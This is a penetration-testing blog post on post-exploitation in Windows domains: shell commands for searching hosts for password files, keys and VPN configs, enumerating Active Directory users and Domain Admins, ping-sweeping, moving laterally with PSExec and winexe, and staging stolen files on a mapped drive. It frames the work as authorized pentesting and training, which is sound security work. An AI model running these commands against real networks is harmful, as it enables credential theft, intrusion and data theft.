Using APT tactics and techniques in your pentests

I have a student that has been asking me about internal network penetration testing so I figured I'd write a blog post about it. I was trying to explain to him that there is so much more to it then just popping boxes. Breaking in a machine is easy, the moving around a network and stealing data without getting caught is the real skill. Basically, you want to use Tactics, Techniques, and Procedures (TTPs) used by Advanced Persistent Threat (APT).

When I do network penetration tests I explain to the customer that there are 4 levels of post exploitation and they need to choose what level they want me to use based on the goals of test.

  • Level 1: Access - proving that you can gain access to hosts.
  • Level 2: Leveraged Access - proving that you can jump from initially compromised hosts to other hosts in the network.
  • Level 3: Data Driven Access - going after the target organization's intellectual property, trade secrets or financials
  • Level 4: Long term command and control (C2) - staying persistent in the environment for a prolonged period of time and exfiltrating data out of the network.

In this blog post I'll try to cover a few of things we pentesters do on internal pentests to data mine the network.


Data Mining The Host

Ok, so you just broke into a machine with a browser, PDF, or java exploit. You are sitting at your meterpreter prompt. You can run a few meterpreter scripts like 'winenum.rb', 'enum_domain_user',  file_collector.rb, int_doc_find.rb or similar scripts but I'm going to try to walk you through doing this stuff without meterpreter scripts so you can better understand what those scripts are doing or write your own.


Let's start by turning our meterpreter shell into a regular shell.

meterpreter> execute -c -H -f cmd -a "/k" -i


Let's figure out which updates were installed on this computer with dism? Windows 7/8 (note: DISM will return far more details than WMIC.):

c:\DISM /Online /Get-Packages



c:\WMIC QFE List



OK, now that we have a regular command prompt let's search the drive and sort the files by time accessed. We can use this to find important files by typing:.

c:\dir C:\ /S /OD /TA


If you actually know the date that a particular file was created you can search the drive and sort the files by time created by typing:.

c:\dir C:\ /S /OD /TC


You can do something similar by searching for files based on the modification date. You can search the drive and sort the files by time written by typing:


c:\dir C:\ /S /OD /TW



A trick that I use a lot is to search the drive for files with business critical words in the file names by typing the following:


c:\dir c:\*bank* /s



c:\dir c:\*password* /s




c:\dir c:\*pass* /s


c:\dir c:\*competitor* /s


c:\dir c:\*finance* /s



These are goodies for financial and risk related data.

c:\dir c:\*invoice* /s

c:\dir c:\*risk* /s

c:\dir c:\*assessment* /s


These are good when you are looking for specific file types (.key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration files, .ica files for Citrix, and log files).

c:\dir c:\*.key* /s

c:\dir c:\*.vsd /s

c:\dir c:\*.pcf /s

c:\dir c:\*.ica /s

c:\dir c:\*.crt /s

c:\dir c:\*.log /s


I look really hard for .pcf, and .ica files. Anything that can give me legitimate access to the network. There is no better backdoor than legitimate access.

Now I did have had a pentest where the customer had named the password file GeorgeBush.xlxs - (yes, every network has a password text file or spreadsheet). Evidently a penetration tester before me had found the password file when it was called passwords.xlsx so they renamed the file. So to search the drive for files with critical data in them instead of just searching by name you can type:


c:\type c:\sysprep.inf


c:\type c:\sysprep\sysprep.xml


c:\findstr /I /N /S /P /C:password *


c:\findstr /I /N /S /P /C:secret *


c:\findstr /I /N /S /P /C:confidential *


c:\findstr /I /N /S /P /C:account *


c:\findstr /I /N /S /P /C:payroll *


c:\findstr /I /N /S /P /C:credit *


c:\findstr /I /N /S /P /C:record *


 Show me some love and tweet this
Tweet: Check out the blog post 'Using APT tactics and techniques in your pentests' by @j0emccrayUsing APT tactics and techniques in your pentests

Active Directory Enumeration

Ok so you've pilfered the host you compromised and now it's time to spread your wings and look for new prey in the network. Let's move on to active directory enumeration and I'll just have to write another blog post on lateral movement later.


I like to use the net view command to look for other hosts in the network.

c:\net view



We can run net view /domain to get a list of the domains and workgroups in the target environment.

c:\net view /domain



Let's look for local users (always check this - every once in a while you'll run into a network that use local accounts for stuff). Sometimes system administrators do make use of local users and groups to do system administration tasks as a means of restricting access to the domain. This can be a good if done very carefully, and it could be really bad as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.

c:\net user


Now let's grab a list of users in the domain.

c:\net user /domain


The for the same reason we checked for local users we need to be sure to check for local groups as well.

c:\net localgroup


c:\net localgroup /domain





c:\net localgroup administrators



Now, it's time to get serious. The next few commands are where I get the really good info.

c:\net localgroup administrators /domain


Finding out the users in the domain is always handy, but nothing like the next command.

c:\net group "Domain Users" /domain


Now here is where you make your money. I like to look for users in the Domain Admins group. After compromising my first host - once I find a user in the Domain Admins group - I spear phish them. That's usually the fastest way to domain admin level access for me.

c:\net group "Domain Admins" /domain




net user "jima" /domain




OK, now let's start moving around the network. No Nmap - no problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file.


more pingsweep.bat

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat



Ok - now all you have to do is just type 'pingsweep' and then the first 3 octets of the target subnet.


pingsweep 10.10.30



Now if you need to generate a list of IP addresses you can use this quick for loop.

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt

more ips.txt


Now let's echo some domain names into a text file.

echo heat >> names.txt

echo jima >> names.txt

echo roge >> names.txt

echo patr >> names.txt

echo jami >> names.txt

echo bonn >> names.txt

echo rhon >> names.txt

echo sall >> names.txt

echo joyj >> names.txt

echo laur >> names.txt

echo sloa >> names.txt

echo Administrator >> names.txt


more names.txt



Now we can use a for loop to look for logged in users

for /f "tokens=1" %a in ('net view ^| find "\\"') do @echo %a >> hosts.txt



Now once you have found machines with logged in users that you have passwords or hashes for you can PSExec to those machines. I know I didn't cover password stealing and hashdumping - I'll do it in another blog post if you guys want me to.


PSExec in Windows

c:\psexec.exe /accepteula \\ -u administrator -p [email protected]! cmd.exe



PSExec in Linux
Just for the sake of making sure that you have this syntax - here is how to do PSExec in Linux. I prefer to use a tool called winexe. I have it on my Amazon S3 if you want to download it from me.

cd ~/toolz


chmod 777 winexe

./winexe -U [email protected]! //WIN7-X64-1 cmd.exe





Here is how I figure out how many users are logged on/connected to a server?





Now you just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat). You do all of the dir commands again, and you do all of the findstr commands again. Grab all of the important files then you map a drive to what you want to become your staging server. Copy all of the important files to that staging server. Here is how to map a network drive.


net use O: \\\c$  /u:administrator [email protected]!

net use /d O:



Whew, this was a long blog post. We covered a lot today, but there is a lot we didn't cover. We didn't cover password stealing, hashdump, pass the hash, or data exfiltration.

I’d love it if you check out the Metasploit Next Level Video Series for only $50:


Let’s call it quits right there, and I’ll come back in a day or so and give you something else to chew on.


Show me some love and tweet this
Tweet: Check out the blog post 'Using APT tactics and techniques in your pentests' by @j0emccrayUsing APT tactics and techniques in your pentests

The following two tabs change content below.
CEO/Founder at Strategic Security "I love helping people, I love my family, I love basketball, I love teaching, and you all know that I love rum and coke."  

2 Responses

  1. YOU
    thanks joe
  2. Hi Joe, Thanks for this blog. This is an excellent resource for improving on skills.Awaiting other articles of this series. Please do include all possible techniques for network penetration testing in further blog posts.

Leave a comment